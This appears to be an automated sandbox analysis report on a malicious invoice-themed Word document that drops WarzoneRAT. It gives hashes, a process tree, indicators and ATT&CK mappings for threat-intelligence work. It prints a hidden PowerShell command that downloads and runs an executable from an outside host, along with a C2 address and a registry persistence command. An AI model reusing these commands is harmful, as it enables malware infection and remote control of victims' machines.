Analysis

  • max time kernel
    148s
  • max time network
    189s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    19-07-2021 13:29

General

  • Target

    INVOICE_00082925.doc

  • Size

    1.0MB

  • MD5

    3347d22680185efb3cd73d55b55a5c6d

  • SHA1

    36f0afde99cdabe38dbe7c281b61c17b1ca41372

  • SHA256

    5f815bd7f39cccb4b92bea3d36861d6844eeea3307e86b237d794c660d1305c3

  • SHA512

    54cd4b8033702d2192fe8d860df7a092a23675e1bf6450f5cc3862346ef6f078b6b3de03da81d246284adf8f7a9362909fde5efa361ce9135e9c29f64a0461db

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://kqz.ugo.si/svchost.exe

Extracted

Family

warzonerat

C2

byx.z86.ru:5200

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE_00082925.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1076
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:560
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1560
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          C:\Users\Admin\AppData\Local\Temp\svchost.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1436
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\svchost.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:940
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\svchost.exe"
              6⤵
                PID:1168
            • C:\ProgramData\svchost.exe
              "C:\ProgramData\svchost.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:588
              • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                C:\Users\Admin\AppData\Local\Temp\svchost.exe
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1488
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe"
                  7⤵
                    PID:1208
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
          2⤵
          • Process spawned unexpected child process
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1592
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          2⤵
            PID:2016

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Credentials in Files

        1
        T1081

        Collection

        Data from Local System

        1
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • C:\ProgramData\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
          MD5

          02ff38ac870de39782aeee04d7b48231

          SHA1

          0390d39fa216c9b0ecdb38238304e518fb2b5095

          SHA256

          fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

          SHA512

          24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
          MD5

          75a8da7754349b38d64c87c938545b1b

          SHA1

          5c28c257d51f1c1587e29164cc03ea880c21b417

          SHA256

          bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

          SHA512

          798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
          MD5

          be4d72095faf84233ac17b94744f7084

          SHA1

          cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

          SHA256

          b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

          SHA512

          43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
          MD5

          df44874327d79bd75e4264cb8dc01811

          SHA1

          1396b06debed65ea93c24998d244edebd3c0209d

          SHA256

          55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

          SHA512

          95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
          MD5

          597009ea0430a463753e0f5b1d1a249e

          SHA1

          4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

          SHA256

          3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

          SHA512

          5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
          MD5

          5e3c7184a75d42dda1a83606a45001d8

          SHA1

          94ca15637721d88f30eb4b6220b805c5be0360ed

          SHA256

          8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

          SHA512

          fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
          MD5

          a725bb9fafcf91f3c6b7861a2bde6db2

          SHA1

          8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

          SHA256

          51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

          SHA512

          1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
          MD5

          a725bb9fafcf91f3c6b7861a2bde6db2

          SHA1

          8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

          SHA256

          51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

          SHA512

          1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
          MD5

          b6d38f250ccc9003dd70efd3b778117f

          SHA1

          d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

          SHA256

          4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

          SHA512

          67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          MD5

          c690db718c2a3d45a466367493553675

          SHA1

          e60e647d41613871bb3c9c6baa34ce5c9e7bfa07

          SHA256

          7192e8082d9d388824953f80976a40a2e156900e0d524bce38137f23858fd1f7

          SHA512

          adcf22965d396b899dfcf296f8a0e8cb4ebea77935c6c8fd73f98063b624ea747255dacae2a0ae3f21a837eef7edc80dc70a47478611084b8422ed020e516c27

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
          MD5

          563a76fa7810b3efc1783a894c3dd753

          SHA1

          61ee868c7c02c2591800b299e6c554710c057c35

          SHA256

          77a702f6061c5abbde3885a26f2e6c59d79e0366df442712e95d68d24957d835

          SHA512

          cb1a4bf82219250b239935db1a65d367b19a7d2dff00250f8d896df18de62a81e7561d4662e20681f6ab89e38562d5433c3d891b535744ec9acf526c3d63d1af

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          MD5

          8e95fab7180f73db4410b06f2361cde8

          SHA1

          d7daf3ba259c22e0e71ecbb454f2cef1f332c8a3

          SHA256

          04bacd8b11ad397081c2b3bfd67c997c50f76d79b892119d11a18e30d3667c18

          SHA512

          7e985ef26db6e63138316007d0ff1be80bb31f5a4660b9f66ff67482064362db63aa0fa6d256813b46338c2ba34135499db950b26bdaed1d9915dd639cfa7496

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          MD5

          8e95fab7180f73db4410b06f2361cde8

          SHA1

          d7daf3ba259c22e0e71ecbb454f2cef1f332c8a3

          SHA256

          04bacd8b11ad397081c2b3bfd67c997c50f76d79b892119d11a18e30d3667c18

          SHA512

          7e985ef26db6e63138316007d0ff1be80bb31f5a4660b9f66ff67482064362db63aa0fa6d256813b46338c2ba34135499db950b26bdaed1d9915dd639cfa7496

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          MD5

          4f9ffdea4c14c9631da93a1c4fb0009a

          SHA1

          fd7b4e0d9c58f8fba3e7e035db6768e116395105

          SHA256

          f033c69be65c0a210fc449186f7cfaf0c18eff02118399021253d08ef9d2f44f

          SHA512

          b391ac75479411d6f7e4b5294864bcc5bd3e131b5a21f7b8e627a2fd69bb75ae22ea327141ae8ab7a5f24d25f5ea3167f2566adb519226cfbef150ead3472bcb

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • \ProgramData\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • \Users\Admin\AppData\Local\Temp\freebl3.dll
          MD5

          ef12ab9d0b231b8f898067b2114b1bc0

          SHA1

          6d90f27b2105945f9bb77039e8b892070a5f9442

          SHA256

          2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7

          SHA512

          2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193

        • \Users\Admin\AppData\Local\Temp\mozglue.dll
          MD5

          75f8cc548cabf0cc800c25047e4d3124

          SHA1

          602676768f9faecd35b48c38a0632781dfbde10c

          SHA256

          fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0

          SHA512

          ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f

        • \Users\Admin\AppData\Local\Temp\msvcp140.dll
          MD5

          109f0f02fd37c84bfc7508d4227d7ed5

          SHA1

          ef7420141bb15ac334d3964082361a460bfdb975

          SHA256

          334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

          SHA512

          46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

        • \Users\Admin\AppData\Local\Temp\nss3.dll
          MD5

          d7858e8449004e21b01d468e9fd04b82

          SHA1

          9524352071ede21c167e7e4f106e9526dc23ef4e

          SHA256

          78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db

          SHA512

          1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440

        • \Users\Admin\AppData\Local\Temp\softokn3.dll
          MD5

          471c983513694ac3002590345f2be0da

          SHA1

          6612b9af4ff6830fa9b7d4193078434ef72f775b

          SHA256

          bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f

          SHA512

          a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410

        • \Users\Admin\AppData\Local\Temp\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • \Users\Admin\AppData\Local\Temp\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • \Users\Admin\AppData\Local\Temp\vcruntime140.dll
          MD5

          7587bf9cb4147022cd5681b015183046

          SHA1

          f2106306a8f6f0da5afb7fc765cfa0757ad5a628

          SHA256

          c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

          SHA512

          0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

        • \Users\Admin\AppData\Roaming\svchost.exe
          MD5

          03c3dcb65eac90148838972f83b3d127

          SHA1

          3444fa4d8a0109e4ed791af052b237f1c3c7e88d

          SHA256

          2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

          SHA512

          ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

        • memory/560-67-0x0000000004930000-0x0000000004931000-memory.dmp
          Filesize

          4KB

        • memory/560-69-0x0000000002490000-0x0000000002491000-memory.dmp
          Filesize

          4KB

        • memory/560-97-0x0000000005720000-0x0000000005721000-memory.dmp
          Filesize

          4KB

        • memory/560-95-0x000000007EF30000-0x000000007EF31000-memory.dmp
          Filesize

          4KB

        • memory/560-70-0x00000000026A0000-0x00000000026A1000-memory.dmp
          Filesize

          4KB

        • memory/560-84-0x0000000005610000-0x0000000005611000-memory.dmp
          Filesize

          4KB

        • memory/560-104-0x0000000006240000-0x0000000006241000-memory.dmp
          Filesize

          4KB

        • memory/560-94-0x0000000005680000-0x0000000005681000-memory.dmp
          Filesize

          4KB

        • memory/560-68-0x0000000004932000-0x0000000004933000-memory.dmp
          Filesize

          4KB

        • memory/560-63-0x0000000000000000-mapping.dmp
        • memory/560-65-0x00000000004C0000-0x00000000004C1000-memory.dmp
          Filesize

          4KB

        • memory/560-66-0x0000000004970000-0x0000000004971000-memory.dmp
          Filesize

          4KB

        • memory/560-110-0x0000000006270000-0x0000000006271000-memory.dmp
          Filesize

          4KB

        • memory/588-148-0x0000000000000000-mapping.dmp
        • memory/588-154-0x0000000000860000-0x0000000000861000-memory.dmp
          Filesize

          4KB

        • memory/588-155-0x0000000000865000-0x0000000000876000-memory.dmp
          Filesize

          68KB

        • memory/588-151-0x0000000000D90000-0x0000000000D91000-memory.dmp
          Filesize

          4KB

        • memory/940-146-0x0000000000000000-mapping.dmp
        • memory/1076-60-0x0000000070171000-0x0000000070173000-memory.dmp
          Filesize

          8KB

        • memory/1076-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1076-62-0x00000000753B1000-0x00000000753B3000-memory.dmp
          Filesize

          8KB

        • memory/1076-59-0x00000000726F1000-0x00000000726F4000-memory.dmp
          Filesize

          12KB

        • memory/1168-153-0x0000000000000000-mapping.dmp
        • memory/1208-169-0x0000000000000000-mapping.dmp
        • memory/1208-170-0x0000000000120000-0x0000000000121000-memory.dmp
          Filesize

          4KB

        • memory/1436-140-0x0000000000400000-0x000000000055E000-memory.dmp
          Filesize

          1.4MB

        • memory/1436-144-0x0000000000400000-0x000000000055E000-memory.dmp
          Filesize

          1.4MB

        • memory/1436-141-0x0000000000405E28-mapping.dmp
        • memory/1488-164-0x0000000000405E28-mapping.dmp
        • memory/1488-171-0x0000000003B50000-0x0000000003C50000-memory.dmp
          Filesize

          1024KB

        • memory/1488-178-0x00000000046D0000-0x0000000004754000-memory.dmp
          Filesize

          528KB

        • memory/1488-167-0x0000000000400000-0x000000000055E000-memory.dmp
          Filesize

          1.4MB

        • memory/1560-91-0x0000000004970000-0x0000000004971000-memory.dmp
          Filesize

          4KB

        • memory/1560-92-0x0000000004972000-0x0000000004973000-memory.dmp
          Filesize

          4KB

        • memory/1560-121-0x0000000006320000-0x0000000006321000-memory.dmp
          Filesize

          4KB

        • memory/1560-71-0x0000000000000000-mapping.dmp
        • memory/1592-73-0x0000000000000000-mapping.dmp
        • memory/1592-93-0x0000000002390000-0x0000000002FDA000-memory.dmp
          Filesize

          12.3MB

        • memory/2016-131-0x0000000000000000-mapping.dmp
        • memory/2016-132-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp
          Filesize

          8KB

        • memory/2036-130-0x0000000004C45000-0x0000000004C56000-memory.dmp
          Filesize

          68KB

        • memory/2036-129-0x0000000004C40000-0x0000000004C41000-memory.dmp
          Filesize

          4KB

        • memory/2036-126-0x0000000001030000-0x0000000001031000-memory.dmp
          Filesize

          4KB

        • memory/2036-123-0x0000000000000000-mapping.dmp
        • memory/2036-133-0x0000000004C80000-0x0000000004CD5000-memory.dmp
          Filesize

          340KB

        • memory/2036-138-0x0000000005520000-0x0000000005596000-memory.dmp
          Filesize

          472KB